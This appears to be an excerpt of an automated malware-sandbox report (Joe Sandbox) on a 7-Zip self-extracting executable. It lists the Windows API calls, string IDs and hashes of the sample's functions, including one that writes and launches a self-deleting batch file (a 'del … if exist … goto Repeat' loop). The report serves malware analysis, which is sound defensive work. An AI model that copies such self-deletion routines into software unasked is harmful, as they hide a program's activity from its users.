                                                                APIs
                                                                • _wtol.MSVCRT ref: 004050E7
                                                                • _wtol.MSVCRT ref: 00405103
                                                                • lstrcmpiW.KERNEL32(00000000,0041B810,?,?,?,?,?,?,?,?,?,?,?,?,?,004062C4), ref: 00404FEA
                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                  • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                                  • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                                  • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                  • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                                  • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(0051A408,?), ref: 00402541
                                                                  • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(0051A408), ref: 00402551
                                                                  • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                                  • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                  • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                  • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle$Q
                                                                • API String ID: 2725485552-3552768495
                                                                • Opcode ID: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
                                                                • Instruction ID: 66a2ce9ff7a2cb702224bd8f74ea761d5872454bbbc4643ec2785d60350ddd68
                                                                • Opcode Fuzzy Hash: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
                                                                • Instruction Fuzzy Hash: AC51D8F1E016007ADA216B275D4ADAF366CEB85704B28443BFD04F22D6E77C4A4046EF
                                                                APIs
                                                                • GetDriveTypeW.KERNEL32(?,?,?), ref: 004057DA
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040580B
                                                                • WriteFile.KERNEL32(0041EA30,?,?,00407468,00000000,del ",:Repeat,00000000), ref: 004058C0
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 004058CB
                                                                • CloseHandle.KERNEL32(0041EA30), ref: 004058D4
                                                                • SetFileAttributesW.KERNEL32(00407468,00000000), ref: 004058EB
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004058FD
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405906
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405912
                                                                • ??3@YAXPAX@Z.MSVCRT(00407468,?), ref: 00405918
                                                                • ??3@YAXPAX@Z.MSVCRT(00407468,?,?,?,?,?,?,?,?,?,?,?,?,?,00407468,0041EA30), ref: 00405946
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                • API String ID: 3007203151-3467708659
                                                                • Opcode ID: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                                                • Instruction ID: eb7ea14b5f0693ba8c6a98bcb421c9bec9bd01f197c59b95adb21b6866ed8523
                                                                • Opcode Fuzzy Hash: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                                                • Instruction Fuzzy Hash: DE413871800108AEDB11ABA5EC86DEF7B7DEF04724F50843AF511721E1EB795E85CB98
                                                                APIs
                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00403436
                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403449
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00403456
                                                                  • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                  • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403483
                                                                • GetParent.USER32(?), ref: 00403491
                                                                • LoadLibraryA.KERNEL32(riched20), ref: 004034A5
                                                                • GetMenu.USER32(?), ref: 004034B8
                                                                • SetThreadLocale.KERNEL32(00000419), ref: 004034C5
                                                                • CreateWindowExW.USER32(00000000,RichEdit20W,0041A584,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004034F5
                                                                • DestroyWindow.USER32(?), ref: 00403506
                                                                • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 0040351B
                                                                • GetSysColor.USER32(0000000F), ref: 0040351F
                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0040352D
                                                                • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403558
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040355D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403565
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                • API String ID: 3514532227-2281146334
                                                                • Opcode ID: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                                                • Instruction ID: e5fea360a7eb9894b086cd4675cd9c6500acd79176ce5b6afcc660833785d9d0
                                                                • Opcode Fuzzy Hash: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                                                • Instruction Fuzzy Hash: 67317F72901109BFDB01AFA5DC49EEF7BBCEB08705F10407AF604F6190DA799E518B6A
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                • LoadIconW.USER32(00000000), ref: 00408EA2
                                                                • GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                • GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                • LoadImageW.USER32(00000000), ref: 00408EC7
                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                • GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                • GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                • GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                • GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                • GetWindow.USER32(?,00000005), ref: 0040904E
                                                                • GetWindow.USER32(?,00000005), ref: 0040906A
                                                                • GetWindow.USER32(?,00000005), ref: 00409082
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00409240), ref: 004090E2
                                                                • LoadIconW.USER32(00000000), ref: 004090E9
                                                                • GetDlgItem.USER32(?,000004B1), ref: 00409108
                                                                • SendMessageW.USER32(00000000), ref: 0040910B
                                                                  • Part of subcall function 00408270: GetDlgItem.USER32(?,?), ref: 0040827A
                                                                  • Part of subcall function 00408270: GetWindowTextLengthW.USER32(00000000), ref: 00408281
                                                                  • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                  • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                • String ID:
                                                                • API String ID: 3694754696-0
                                                                • Opcode ID: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
                                                                • Instruction ID: 99f397414dc97442f2ad5b2e660166812613d2f2543b201c56f9d92a48738ce2
                                                                • Opcode Fuzzy Hash: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
                                                                • Instruction Fuzzy Hash: B971E6703047056BEA216B21DD4AF2B3659EF84714F10443EF652BA2E3CFBDAC018A5E
                                                                APIs
                                                                • GetWindowDC.USER32(00000000), ref: 004021B4
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                                • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                                • CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                                • CreateCompatibleDC.GDI32(?), ref: 00402232
                                                                • SelectObject.GDI32(00000000,?), ref: 00402240
                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                                • SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                                • SelectObject.GDI32(00000000,?), ref: 00402293
                                                                • SelectObject.GDI32(00000000,?), ref: 00402299
                                                                • DeleteDC.GDI32(00000000), ref: 004022A2
                                                                • DeleteDC.GDI32(00000000), ref: 004022A5
                                                                • ReleaseDC.USER32(00000000,?), ref: 004022AC
                                                                • ReleaseDC.USER32(00000000,?), ref: 004022BB
                                                                • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004022C8
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                • String ID:
                                                                • API String ID: 3462224810-0
                                                                • Opcode ID: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                                                • Instruction ID: 3b0073103a1e3377af01ca77c53c0656b208625dbf3d379900f4631a354f9c66
                                                                • Opcode Fuzzy Hash: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                                                • Instruction Fuzzy Hash: DB314A76D01208BFDF115FE19D48EEF7F79EB48760F108066FA04B61A0C6794A60EB66
                                                                APIs
                                                                • GetClassNameA.USER32(?,?,00000040), ref: 004022E5
                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 004022FC
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040230F
                                                                • GetMenu.USER32(?), ref: 00402324
                                                                  • Part of subcall function 004020BF: GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                                  • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                                  • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                                  • Part of subcall function 004020BF: SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                                  • Part of subcall function 004020BF: LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                                  • Part of subcall function 004020BF: LockResource.KERNEL32(00000000), ref: 00402121
                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402356
                                                                • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00402363
                                                                • CoInitialize.OLE32(00000000), ref: 0040236C
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402378
                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C434,?), ref: 0040239D
                                                                • GlobalFree.KERNEL32(00000000), ref: 004023AD
                                                                  • Part of subcall function 004021A8: GetWindowDC.USER32(00000000), ref: 004021B4
                                                                  • Part of subcall function 004021A8: GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                                  • Part of subcall function 004021A8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                                  • Part of subcall function 004021A8: GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                                  • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                                  • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                                  • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                                  • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 00402232
                                                                  • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402240
                                                                  • Part of subcall function 004021A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                                  • Part of subcall function 004021A8: SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                                  • Part of subcall function 004021A8: SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                                  • Part of subcall function 004021A8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                                  • Part of subcall function 004021A8: GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                                  • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402293
                                                                  • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402299
                                                                  • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A2
                                                                  • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A5
                                                                  • Part of subcall function 004021A8: ReleaseDC.USER32(00000000,?), ref: 004022AC
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 004023DF
                                                                • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004023F3
                                                                • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00402405
                                                                • GlobalFree.KERNEL32(00000000), ref: 0040241A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                • String ID: IMAGES$STATIC
                                                                • API String ID: 4202116410-1168396491
                                                                • Opcode ID: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                                                • Instruction ID: 12319829fe5b29bb351e3d23e86017266b1b8e93f03e65421de7465a1357d20e
                                                                • Opcode Fuzzy Hash: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                                                • Instruction Fuzzy Hash: 54419A31901218BFCB129FA1CC4CDEEBFB9FF09715B008076F905A62A0D7798A51DB69
                                                                APIs
                                                                  • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                  • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                • GetDlgItem.USER32(?,000004B8), ref: 004092EE
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004092FD
                                                                • GetDlgItem.USER32(?,000004B5), ref: 00409344
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00409349
                                                                • GetDlgItem.USER32(?,000004B5), ref: 00409359
                                                                • SetWindowLongW.USER32(00000000), ref: 0040935C
                                                                • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00409382
                                                                • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00409394
                                                                • GetDlgItem.USER32(?,000004B4), ref: 0040939E
                                                                • SetFocus.USER32(00000000), ref: 004093A1
                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004093D0
                                                                • CoCreateInstance.OLE32(0041C464,00000000,00000001,0041BD6C,?), ref: 004093F4
                                                                • GetDlgItem.USER32(?,00000002), ref: 00409411
                                                                • IsWindow.USER32(00000000), ref: 00409414
                                                                • GetDlgItem.USER32(?,00000002), ref: 00409424
                                                                • EnableWindow.USER32(00000000), ref: 00409427
                                                                • GetDlgItem.USER32(?,000004B5), ref: 0040943B
                                                                • ShowWindow.USER32(00000000), ref: 0040943E
                                                                  • Part of subcall function 0040819E: GetDlgItem.USER32(?,000004B6), ref: 004081AC
                                                                  • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                  • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                                  • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                  • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                  • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                  • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                                  • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                  • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                  • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                  • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                  • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                  • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                • String ID:
                                                                • API String ID: 1057135554-0
                                                                • Opcode ID: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                                                • Instruction ID: 5db8082ad3932120c1d3ad580c4d4a8d12b10d7a787853330903dc21ac74032f
                                                                • Opcode Fuzzy Hash: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                                                • Instruction Fuzzy Hash: E54184B0605708AFDA246F22DD49F6B7B9DFF44B04F00843EF955A62E1CB79A850CA1D
                                                                APIs
                                                                • GetDlgItem.USER32(?,000004B3), ref: 00407A80
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00407A85
                                                                • GetDlgItem.USER32(?,000004B4), ref: 00407ABC
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00407AC1
                                                                • GetSystemMetrics.USER32(00000010), ref: 00407B43
                                                                • GetSystemMetrics.USER32(00000011), ref: 00407B49
                                                                • GetSystemMetrics.USER32(00000008), ref: 00407B50
                                                                • GetSystemMetrics.USER32(00000007), ref: 00407B57
                                                                • GetParent.USER32(?), ref: 00407B7B
                                                                • GetClientRect.USER32(00000000,?), ref: 00407B8D
                                                                • ClientToScreen.USER32(?,?), ref: 00407BA0
                                                                • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407C06
                                                                • GetClientRect.USER32(?,?), ref: 00407CA0
                                                                  • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A47
                                                                  • Part of subcall function 00407A29: SetWindowPos.USER32(00000000), ref: 00407A4E
                                                                • ClientToScreen.USER32(?,?), ref: 00407BA9
                                                                  • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                • GetSystemMetrics.USER32(00000008), ref: 00407D25
                                                                • GetSystemMetrics.USER32(00000007), ref: 00407D2C
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                • String ID:
                                                                • API String ID: 747815384-0
                                                                • Opcode ID: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                                                • Instruction ID: 68cc850d19f91a6f8b6e213b01393e3a0b6efc74fec8c50de4b66a5980513343
                                                                • Opcode Fuzzy Hash: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                                                • Instruction Fuzzy Hash: 30A13870E04209AFDB14DFBDCD85AAEBBF9EF48704F14452AE605F2281D678F9018B65
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,0041E3F0,00000000), ref: 0040377F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,0041E3F0,00000000), ref: 00403787
                                                                • ??3@YAXPAX@Z.MSVCRT(00404A6A,?), ref: 004039AD
                                                                  • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 00402996
                                                                  • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 0040299D
                                                                • ??3@YAXPAX@Z.MSVCRT(00404A6A,?,?,00000000,00000000,0041E3F0,00000000), ref: 004039DA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: SetEnvironment${\rtf
                                                                • API String ID: 613200358-318139784
                                                                • Opcode ID: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                                                • Instruction ID: 401acfcb82d7e6738f93d8480f5cee0d093a2887585a601c22b507f4e5910529
                                                                • Opcode Fuzzy Hash: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                                                • Instruction Fuzzy Hash: B991C372900108ABDF11AFD5D941AEEBBB8AF14309F2480BBE841772D2D7785B06DB59
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
